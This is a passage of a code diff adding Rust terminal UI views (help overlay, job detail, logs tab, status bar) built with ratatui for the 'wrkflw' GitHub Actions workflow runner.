Line::from(vec![
|
||||
Span::styled(
|
||||
"r",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Run selected workflows"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"a",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Select all workflows"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"n",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Deselect all workflows"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"Shift+R",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Reset workflow status"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"t",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Trigger remote workflow"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(Span::styled(
|
||||
"🔧 EXECUTION MODES",
|
||||
Style::default()
|
||||
.fg(Color::Magenta)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"e",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle emulation mode"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"v",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle validation mode"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(vec![Span::styled(
|
||||
"Runtime Modes:",
|
||||
Style::default()
|
||||
.fg(Color::White)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)]),
|
||||
Line::from(vec![
|
||||
Span::raw(" • "),
|
||||
Span::styled("Docker", Style::default().fg(Color::Blue)),
|
||||
Span::raw(" - Container isolation (default)"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::raw(" • "),
|
||||
Span::styled("Podman", Style::default().fg(Color::Blue)),
|
||||
Span::raw(" - Rootless containers"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::raw(" • "),
|
||||
Span::styled("Emulation", Style::default().fg(Color::Red)),
|
||||
Span::raw(" - Process mode (UNSAFE)"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::raw(" • "),
|
||||
Span::styled("Secure Emulation", Style::default().fg(Color::Yellow)),
|
||||
Span::raw(" - Sandboxed processes"),
|
||||
]),
|
||||
];
|
||||
|
||||
// Right column content
|
||||
let right_help_text = vec![
|
||||
Line::from(Span::styled(
|
||||
"📄 LOGS & SEARCH",
|
||||
Style::default()
|
||||
.fg(Color::Blue)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"s",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle log search"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"f",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle log filter"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"c",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Clear search & filter"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"n",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Next search match"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"↑/↓",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Scroll logs/Navigate"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(Span::styled(
|
||||
"ℹ️ TAB OVERVIEW",
|
||||
Style::default()
|
||||
.fg(Color::White)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"1. Workflows",
|
||||
Style::default()
|
||||
.fg(Color::Cyan)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Browse & select workflows"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" • View workflow files")]),
|
||||
Line::from(vec![Span::raw(" • Select multiple for batch execution")]),
|
||||
Line::from(vec![Span::raw(" • Trigger remote workflows")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"2. Execution",
|
||||
Style::default()
|
||||
.fg(Color::Green)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Monitor job progress"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" • View job status and details")]),
|
||||
Line::from(vec![Span::raw(" • Enter job details with Enter")]),
|
||||
Line::from(vec![Span::raw(" • Navigate step execution")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"3. Logs",
|
||||
Style::default()
|
||||
.fg(Color::Blue)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - View execution logs"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" • Search and filter logs")]),
|
||||
Line::from(vec![Span::raw(" • Real-time log streaming")]),
|
||||
Line::from(vec![Span::raw(" • Navigate search results")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"4. Help",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - This comprehensive guide"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(Span::styled(
|
||||
"🎯 QUICK ACTIONS",
|
||||
Style::default().fg(Color::Red).add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"?",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle help overlay"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"q",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Quit application"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(Span::styled(
|
||||
"💡 TIPS",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::raw("• Use "),
|
||||
Span::styled("emulation mode", Style::default().fg(Color::Red)),
|
||||
Span::raw(" when containers"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" are unavailable or for quick testing")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::raw("• "),
|
||||
Span::styled("Secure emulation", Style::default().fg(Color::Yellow)),
|
||||
Span::raw(" provides sandboxing"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" for untrusted workflows")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::raw("• Use "),
|
||||
Span::styled("validation mode", Style::default().fg(Color::Green)),
|
||||
Span::raw(" to check"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" workflows without execution")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::raw("• "),
|
||||
Span::styled("Preserve containers", Style::default().fg(Color::Blue)),
|
||||
Span::raw(" on failure"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" for debugging (Docker/Podman only)")]),
|
||||
];
|
||||
|
||||
// Apply scroll offset to the content
|
||||
let left_help_text = if scroll_offset < left_help_text.len() {
|
||||
left_help_text.into_iter().skip(scroll_offset).collect()
|
||||
} else {
|
||||
vec![Line::from("")]
|
||||
};
|
||||
|
||||
let right_help_text = if scroll_offset < right_help_text.len() {
|
||||
right_help_text.into_iter().skip(scroll_offset).collect()
|
||||
} else {
|
||||
vec![Line::from("")]
|
||||
};
|
||||
|
||||
// Render left column
|
||||
let left_widget = Paragraph::new(left_help_text)
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
" WRKFLW Help - Controls & Features ",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
)
|
||||
.wrap(Wrap { trim: true });
|
||||
|
||||
// Render right column
|
||||
let right_widget = Paragraph::new(right_help_text)
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
" Interface Guide & Tips ",
|
||||
Style::default()
|
||||
.fg(Color::Cyan)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
)
|
||||
.wrap(Wrap { trim: true });
|
||||
|
||||
f.render_widget(left_widget, chunks[0]);
|
||||
f.render_widget(right_widget, chunks[1]);
|
||||
}
|
||||
|
||||
// Render a help overlay
|
||||
pub fn render_help_overlay(f: &mut Frame<CrosstermBackend<io::Stdout>>, scroll_offset: usize) {
|
||||
let size = f.size();
|
||||
|
||||
// Create a larger centered modal to accommodate comprehensive help content
|
||||
let width = (size.width * 9 / 10).min(120); // Use 90% of width, max 120 chars
|
||||
let height = (size.height * 9 / 10).min(40); // Use 90% of height, max 40 lines
|
||||
let x = (size.width - width) / 2;
|
||||
let y = (size.height - height) / 2;
|
||||
|
||||
let help_area = Rect {
|
||||
x,
|
||||
y,
|
||||
width,
|
||||
height,
|
||||
};
|
||||
|
||||
// Create a semi-transparent dark background for better visibility
|
||||
let clear = Block::default().style(Style::default().bg(Color::Black));
|
||||
f.render_widget(clear, size);
|
||||
|
||||
// Add a border around the entire overlay for better visual separation
|
||||
let overlay_block = Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Double)
|
||||
.style(Style::default().bg(Color::Black).fg(Color::White))
|
||||
.title(Span::styled(
|
||||
" Press ? or Esc to close help ",
|
||||
Style::default()
|
||||
.fg(Color::Gray)
|
||||
.add_modifier(Modifier::ITALIC),
|
||||
));
|
||||
|
||||
f.render_widget(overlay_block, help_area);
|
||||
|
||||
// Create inner area for content
|
||||
let inner_area = Rect {
|
||||
x: help_area.x + 1,
|
||||
y: help_area.y + 1,
|
||||
width: help_area.width.saturating_sub(2),
|
||||
height: help_area.height.saturating_sub(2),
|
||||
};
|
||||
|
||||
// Render the help content with scroll support
|
||||
render_help_content(f, inner_area, scroll_offset);
|
||||
}
|
||||
211
crates/ui/src/views/job_detail.rs
Normal file
211
crates/ui/src/views/job_detail.rs
Normal file
@@ -0,0 +1,211 @@
|
||||
// Job detail view rendering
|
||||
use crate::app::App;
|
||||
use ratatui::{
|
||||
backend::CrosstermBackend,
|
||||
layout::{Constraint, Direction, Layout, Rect},
|
||||
style::{Color, Modifier, Style},
|
||||
text::{Line, Span},
|
||||
widgets::{Block, BorderType, Borders, Paragraph, Row, Table},
|
||||
Frame,
|
||||
};
|
||||
use std::io;
|
||||
|
||||
// Render the job detail view
|
||||
pub fn render_job_detail_view(
|
||||
f: &mut Frame<CrosstermBackend<io::Stdout>>,
|
||||
app: &mut App,
|
||||
area: Rect,
|
||||
) {
|
||||
// Get the workflow index either from current_execution or selected workflow
|
||||
let current_workflow_idx = app
|
||||
.current_execution
|
||||
.or_else(|| app.workflow_list_state.selected())
|
||||
.filter(|&idx| idx < app.workflows.len());
|
||||
|
||||
if let Some(workflow_idx) = current_workflow_idx {
|
||||
// Only proceed if we have execution details
|
||||
if let Some(execution) = &app.workflows[workflow_idx].execution_details {
|
||||
// Only proceed if we have a valid job selection
|
||||
if let Some(job_idx) = app.job_list_state.selected() {
|
||||
if job_idx < execution.jobs.len() {
|
||||
let job = &execution.jobs[job_idx];
|
||||
|
||||
// Split the area into sections
|
||||
let chunks = Layout::default()
|
||||
.direction(Direction::Vertical)
|
||||
.constraints(
|
||||
[
|
||||
Constraint::Length(3), // Job title
|
||||
Constraint::Min(5), // Steps table
|
||||
Constraint::Length(8), // Step details
|
||||
]
|
||||
.as_ref(),
|
||||
)
|
||||
.margin(1)
|
||||
.split(area);
|
||||
|
||||
// Job title section
|
||||
let status_text = match job.status {
|
||||
wrkflw_executor::JobStatus::Success => "Success",
|
||||
wrkflw_executor::JobStatus::Failure => "Failed",
|
||||
wrkflw_executor::JobStatus::Skipped => "Skipped",
|
||||
};
|
||||
|
||||
let status_style = match job.status {
|
||||
wrkflw_executor::JobStatus::Success => Style::default().fg(Color::Green),
|
||||
wrkflw_executor::JobStatus::Failure => Style::default().fg(Color::Red),
|
||||
wrkflw_executor::JobStatus::Skipped => Style::default().fg(Color::Yellow),
|
||||
};
|
||||
|
||||
let job_title = Paragraph::new(vec![
|
||||
Line::from(vec![
|
||||
Span::styled("Job: ", Style::default().fg(Color::Blue)),
|
||||
Span::styled(
|
||||
job.name.clone(),
|
||||
Style::default()
|
||||
.fg(Color::White)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" ("),
|
||||
Span::styled(status_text, status_style),
|
||||
Span::raw(")"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled("Steps: ", Style::default().fg(Color::Blue)),
|
||||
Span::styled(
|
||||
format!("{}", job.steps.len()),
|
||||
Style::default().fg(Color::White),
|
||||
),
|
||||
]),
|
||||
])
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
" Job Details ",
|
||||
Style::default().fg(Color::Yellow),
|
||||
)),
|
||||
);
|
||||
|
||||
f.render_widget(job_title, chunks[0]);
|
||||
|
||||
// Steps section
|
||||
let header_cells = ["Status", "Step Name"].iter().map(|h| {
|
||||
ratatui::widgets::Cell::from(*h).style(Style::default().fg(Color::Yellow))
|
||||
});
|
||||
|
||||
let header = Row::new(header_cells)
|
||||
.style(Style::default().add_modifier(Modifier::BOLD))
|
||||
.height(1);
|
||||
|
||||
let rows = job.steps.iter().map(|step| {
|
||||
let status_symbol = match step.status {
|
||||
wrkflw_executor::StepStatus::Success => "✅",
|
||||
wrkflw_executor::StepStatus::Failure => "❌",
|
||||
wrkflw_executor::StepStatus::Skipped => "⏭",
|
||||
};
|
||||
|
||||
let status_style = match step.status {
|
||||
wrkflw_executor::StepStatus::Success => {
|
||||
Style::default().fg(Color::Green)
|
||||
}
|
||||
wrkflw_executor::StepStatus::Failure => Style::default().fg(Color::Red),
|
||||
wrkflw_executor::StepStatus::Skipped => {
|
||||
Style::default().fg(Color::Gray)
|
||||
}
|
||||
};
|
||||
|
||||
Row::new(vec![
|
||||
ratatui::widgets::Cell::from(status_symbol).style(status_style),
|
||||
ratatui::widgets::Cell::from(step.name.clone()),
|
||||
])
|
||||
});
|
||||
|
||||
let steps_table = Table::new(rows)
|
||||
.header(header)
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(" Steps ", Style::default().fg(Color::Yellow))),
|
||||
)
|
||||
.highlight_style(
|
||||
Style::default()
|
||||
.bg(Color::DarkGray)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)
|
||||
.highlight_symbol("» ")
|
||||
.widths(&[
|
||||
Constraint::Length(8), // Status icon column
|
||||
Constraint::Percentage(92), // Name column
|
||||
]);
|
||||
|
||||
// We need to use the table state from the app
|
||||
f.render_stateful_widget(steps_table, chunks[1], &mut app.step_table_state);
|
||||
|
||||
// Step detail section
|
||||
if let Some(step_idx) = app.step_table_state.selected() {
|
||||
if step_idx < job.steps.len() {
|
||||
let step = &job.steps[step_idx];
|
||||
|
||||
// Show step output with proper styling
|
||||
let status_text = match step.status {
|
||||
wrkflw_executor::StepStatus::Success => "Success",
|
||||
wrkflw_executor::StepStatus::Failure => "Failed",
|
||||
wrkflw_executor::StepStatus::Skipped => "Skipped",
|
||||
};
|
||||
|
||||
let status_style = match step.status {
|
||||
wrkflw_executor::StepStatus::Success => {
|
||||
Style::default().fg(Color::Green)
|
||||
}
|
||||
wrkflw_executor::StepStatus::Failure => {
|
||||
Style::default().fg(Color::Red)
|
||||
}
|
||||
wrkflw_executor::StepStatus::Skipped => {
|
||||
Style::default().fg(Color::Yellow)
|
||||
}
|
||||
};
|
||||
|
||||
let mut output_text = step.output.clone();
|
||||
// Truncate if too long
|
||||
if output_text.len() > 1000 {
|
||||
output_text = format!("{}... [truncated]", &output_text[..1000]);
|
||||
}
|
||||
|
||||
let step_detail = Paragraph::new(vec![
|
||||
Line::from(vec![
|
||||
Span::styled("Step: ", Style::default().fg(Color::Blue)),
|
||||
Span::styled(
|
||||
step.name.clone(),
|
||||
Style::default()
|
||||
.fg(Color::White)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" ("),
|
||||
Span::styled(status_text, status_style),
|
||||
Span::raw(")"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(output_text),
|
||||
])
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
" Step Output ",
|
||||
Style::default().fg(Color::Yellow),
|
||||
)),
|
||||
)
|
||||
.wrap(ratatui::widgets::Wrap { trim: false });
|
||||
|
||||
f.render_widget(step_detail, chunks[2]);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
209
crates/ui/src/views/logs_tab.rs
Normal file
209
crates/ui/src/views/logs_tab.rs
Normal file
@@ -0,0 +1,209 @@
|
||||
// Logs tab rendering
|
||||
use crate::app::App;
|
||||
use ratatui::{
|
||||
backend::CrosstermBackend,
|
||||
layout::{Alignment, Constraint, Direction, Layout, Rect},
|
||||
style::{Color, Modifier, Style},
|
||||
text::{Line, Span},
|
||||
widgets::{Block, BorderType, Borders, Cell, Paragraph, Row, Table, TableState},
|
||||
Frame,
|
||||
};
|
||||
use std::io;
|
||||
|
||||
// Render the logs tab
|
||||
pub fn render_logs_tab(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App, area: Rect) {
|
||||
// Split the area into header, search bar (optionally shown), and log content
|
||||
let chunks = Layout::default()
|
||||
.direction(Direction::Vertical)
|
||||
.constraints(
|
||||
[
|
||||
Constraint::Length(3), // Header with instructions
|
||||
Constraint::Length(
|
||||
if app.log_search_active
|
||||
|| !app.log_search_query.is_empty()
|
||||
|| app.log_filter_level.is_some()
|
||||
{
|
||||
3
|
||||
} else {
|
||||
0
|
||||
},
|
||||
), // Search bar (optional)
|
||||
Constraint::Min(3), // Logs content
|
||||
]
|
||||
.as_ref(),
|
||||
)
|
||||
.margin(1)
|
||||
.split(area);
|
||||
|
||||
// Determine if search/filter bar should be shown
|
||||
let show_search_bar =
|
||||
app.log_search_active || !app.log_search_query.is_empty() || app.log_filter_level.is_some();
|
||||
|
||||
// Render header with instructions
|
||||
let mut header_text = vec![
|
||||
Line::from(vec![Span::styled(
|
||||
"Execution and System Logs",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)]),
|
||||
Line::from(vec![
|
||||
Span::styled("↑/↓", Style::default().fg(Color::Cyan)),
|
||||
Span::raw(" or "),
|
||||
Span::styled("j/k", Style::default().fg(Color::Cyan)),
|
||||
Span::raw(": Navigate logs/matches "),
|
||||
Span::styled("s", Style::default().fg(Color::Cyan)),
|
||||
Span::raw(": Search "),
|
||||
Span::styled("f", Style::default().fg(Color::Cyan)),
|
||||
Span::raw(": Filter "),
|
||||
Span::styled("Tab", Style::default().fg(Color::Cyan)),
|
||||
Span::raw(": Switch tabs"),
|
||||
]),
|
||||
];
|
||||
|
||||
if show_search_bar {
|
||||
header_text.push(Line::from(vec![
|
||||
Span::styled("Enter", Style::default().fg(Color::Cyan)),
|
||||
Span::raw(": Apply search "),
|
||||
Span::styled("Esc", Style::default().fg(Color::Cyan)),
|
||||
Span::raw(": Clear search "),
|
||||
Span::styled("c", Style::default().fg(Color::Cyan)),
|
||||
Span::raw(": Clear all filters"),
|
||||
]));
|
||||
}
|
||||
|
||||
let header = Paragraph::new(header_text)
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded),
|
||||
)
|
||||
.alignment(Alignment::Center);
|
||||
|
||||
f.render_widget(header, chunks[0]);
|
||||
|
||||
// Render search bar if active or has content
|
||||
if show_search_bar {
|
||||
let search_text = if app.log_search_active {
|
||||
format!("Search: {}█", app.log_search_query)
|
||||
} else {
|
||||
format!("Search: {}", app.log_search_query)
|
||||
};
|
||||
|
||||
let filter_text = match &app.log_filter_level {
|
||||
Some(level) => format!("Filter: {}", level.to_string()),
|
||||
None => "No filter".to_string(),
|
||||
};
|
||||
|
||||
let match_info = if !app.log_search_matches.is_empty() {
|
||||
format!(
|
||||
"Matches: {}/{}",
|
||||
app.log_search_match_idx + 1,
|
||||
app.log_search_matches.len()
|
||||
)
|
||||
} else if !app.log_search_query.is_empty() {
|
||||
"No matches".to_string()
|
||||
} else {
|
||||
"".to_string()
|
||||
};
|
||||
|
||||
let search_info = Line::from(vec![
|
||||
Span::raw(search_text),
|
||||
Span::raw(" "),
|
||||
Span::styled(
|
||||
filter_text,
|
||||
Style::default().fg(match &app.log_filter_level {
|
||||
Some(crate::models::LogFilterLevel::Error) => Color::Red,
|
||||
Some(crate::models::LogFilterLevel::Warning) => Color::Yellow,
|
||||
Some(crate::models::LogFilterLevel::Info) => Color::Cyan,
|
||||
Some(crate::models::LogFilterLevel::Success) => Color::Green,
|
||||
Some(crate::models::LogFilterLevel::Trigger) => Color::Magenta,
|
||||
Some(crate::models::LogFilterLevel::All) | None => Color::Gray,
|
||||
}),
|
||||
),
|
||||
Span::raw(" "),
|
||||
Span::styled(match_info, Style::default().fg(Color::Magenta)),
|
||||
]);
|
||||
|
||||
let search_block = Paragraph::new(search_info)
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
" Search & Filter ",
|
||||
Style::default().fg(Color::Yellow),
|
||||
)),
|
||||
)
|
||||
.alignment(Alignment::Left);
|
||||
|
||||
f.render_widget(search_block, chunks[1]);
|
||||
}
|
||||
|
||||
// Use processed logs from background thread instead of processing on every frame
|
||||
let filtered_logs = &app.processed_logs;
|
||||
|
||||
// Create a table for logs for better organization
|
||||
let header_cells = ["Time", "Type", "Message"]
|
||||
.iter()
|
||||
.map(|h| Cell::from(*h).style(Style::default().fg(Color::Yellow)));
|
||||
|
||||
let header = Row::new(header_cells)
|
||||
.style(Style::default().add_modifier(Modifier::BOLD))
|
||||
.height(1);
|
||||
|
||||
// Convert processed logs to table rows - this is now very fast since logs are pre-processed
|
||||
let rows = filtered_logs
|
||||
.iter()
|
||||
.map(|processed_log| processed_log.to_row());
|
||||
|
||||
let content_idx = if show_search_bar { 2 } else { 1 };
|
||||
|
||||
let log_table = Table::new(rows)
|
||||
.header(header)
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
format!(
|
||||
" Logs ({}/{}) ",
|
||||
if filtered_logs.is_empty() {
|
||||
0
|
||||
} else {
|
||||
app.log_scroll + 1
|
||||
},
|
||||
filtered_logs.len()
|
||||
),
|
||||
Style::default().fg(Color::Yellow),
|
||||
)),
|
||||
)
|
||||
.highlight_style(Style::default().bg(Color::DarkGray))
|
||||
.widths(&[
|
||||
Constraint::Length(10), // Timestamp column
|
||||
Constraint::Length(7), // Log type column
|
||||
Constraint::Percentage(80), // Message column
|
||||
]);
|
||||
|
||||
// We need to convert log_scroll index to a TableState
|
||||
let mut log_table_state = TableState::default();
|
||||
|
||||
if !filtered_logs.is_empty() {
|
||||
// If we have search matches, use the match index as the selected row
|
||||
if !app.log_search_matches.is_empty() {
|
||||
// Make sure we're within bounds
|
||||
let _match_index = app
|
||||
.log_search_match_idx
|
||||
.min(app.log_search_matches.len() - 1);
|
||||
|
||||
// This would involve more complex logic to go from search matches to the filtered logs
|
||||
// For simplicity in this placeholder, we'll just use the scroll position
|
||||
log_table_state.select(Some(app.log_scroll.min(filtered_logs.len() - 1)));
|
||||
} else {
|
||||
// No search matches, use regular scroll position
|
||||
log_table_state.select(Some(app.log_scroll.min(filtered_logs.len() - 1)));
|
||||
}
|
||||
}
|
||||
|
||||
f.render_stateful_widget(log_table, chunks[content_idx], &mut log_table_state);
|
||||
}
|
||||
57
crates/ui/src/views/mod.rs
Normal file
57
crates/ui/src/views/mod.rs
Normal file
@@ -0,0 +1,57 @@
|
||||
// UI Views module
|
||||
mod execution_tab;
|
||||
mod help_overlay;
|
||||
mod job_detail;
|
||||
mod logs_tab;
|
||||
mod status_bar;
|
||||
mod title_bar;
|
||||
mod workflows_tab;
|
||||
|
||||
use crate::app::App;
|
||||
use ratatui::{backend::CrosstermBackend, Frame};
|
||||
use std::io;
|
||||
|
||||
// Main render function for the UI
|
||||
pub fn render_ui(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &mut App) {
|
||||
// Check if help should be shown as an overlay
|
||||
if app.show_help {
|
||||
help_overlay::render_help_overlay(f, app.help_scroll);
|
||||
return;
|
||||
}
|
||||
|
||||
let size = f.size();
|
||||
|
||||
// Create main layout
|
||||
let main_chunks = ratatui::layout::Layout::default()
|
||||
.direction(ratatui::layout::Direction::Vertical)
|
||||
.constraints(
|
||||
[
|
||||
ratatui::layout::Constraint::Length(3), // Title bar and tabs
|
||||
ratatui::layout::Constraint::Min(5), // Main content
|
||||
ratatui::layout::Constraint::Length(2), // Status bar
|
||||
]
|
||||
.as_ref(),
|
||||
)
|
||||
.split(size);
|
||||
|
||||
// Render title bar with tabs
|
||||
title_bar::render_title_bar(f, app, main_chunks[0]);
|
||||
|
||||
// Render main content based on selected tab
|
||||
match app.selected_tab {
|
||||
0 => workflows_tab::render_workflows_tab(f, app, main_chunks[1]),
|
||||
1 => {
|
||||
if app.detailed_view {
|
||||
job_detail::render_job_detail_view(f, app, main_chunks[1])
|
||||
} else {
|
||||
execution_tab::render_execution_tab(f, app, main_chunks[1])
|
||||
}
|
||||
}
|
||||
2 => logs_tab::render_logs_tab(f, app, main_chunks[1]),
|
||||
3 => help_overlay::render_help_content(f, main_chunks[1], app.help_scroll),
|
||||
_ => {}
|
||||
}
|
||||
|
||||
// Render status bar
|
||||
status_bar::render_status_bar(f, app, main_chunks[2]);
|
||||
}
|
||||
212
crates/ui/src/views/status_bar.rs
Normal file
212
crates/ui/src/views/status_bar.rs
Normal file
@@ -0,0 +1,212 @@
|
||||
// Status bar rendering
|
||||
use crate::app::App;
|
||||
use ratatui::{
|
||||
backend::CrosstermBackend,
|
||||
layout::{Alignment, Rect},
|
||||
style::{Color, Style},
|
||||
text::{Line, Span},
|
||||
widgets::Paragraph,
|
||||
Frame,
|
||||
};
|
||||
use std::io;
|
||||
use wrkflw_executor::RuntimeType;
|
||||
|
||||
// Render the status bar
|
||||
pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App, area: Rect) {
|
||||
// If we have a status message, show it instead of the normal status bar
|
||||
if let Some(message) = &app.status_message {
|
||||
// Determine if this is a success message (starts with ✅)
|
||||
let is_success = message.starts_with("✅");
|
||||
|
||||
let status_message = Paragraph::new(Line::from(vec![Span::styled(
|
||||
format!(" {} ", message),
|
||||
Style::default()
|
||||
.bg(if is_success { Color::Green } else { Color::Red })
|
||||
.fg(Color::White)
|
||||
.add_modifier(ratatui::style::Modifier::BOLD),
|
||||
)]))
|
||||
.alignment(Alignment::Center);
|
||||
|
||||
f.render_widget(status_message, area);
|
||||
return;
|
||||
}
|
||||
|
||||
// Normal status bar
|
||||
let mut status_items = vec![];
|
||||
|
||||
// Add mode info
|
||||
status_items.push(Span::styled(
|
||||
format!(" {} ", app.runtime_type_name()),
|
||||
Style::default()
|
||||
.bg(match app.runtime_type {
|
||||
RuntimeType::Docker => Color::Blue,
|
||||
RuntimeType::Podman => Color::Cyan,
|
||||
RuntimeType::SecureEmulation => Color::Green,
|
||||
RuntimeType::Emulation => Color::Red,
|
||||
})
|
||||
.fg(Color::White),
|
||||
));
|
||||
|
||||
// Add container runtime status if relevant
|
||||
match app.runtime_type {
|
||||
RuntimeType::Docker => {
|
||||
// Check Docker silently using safe FD redirection
|
||||
let is_docker_available = match wrkflw_utils::fd::with_stderr_to_null(
|
||||
wrkflw_executor::docker::is_available,
|
||||
) {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
wrkflw_logging::debug(
|
||||
"Failed to redirect stderr when checking Docker availability.",
|
||||
);
|
||||
false
|
||||
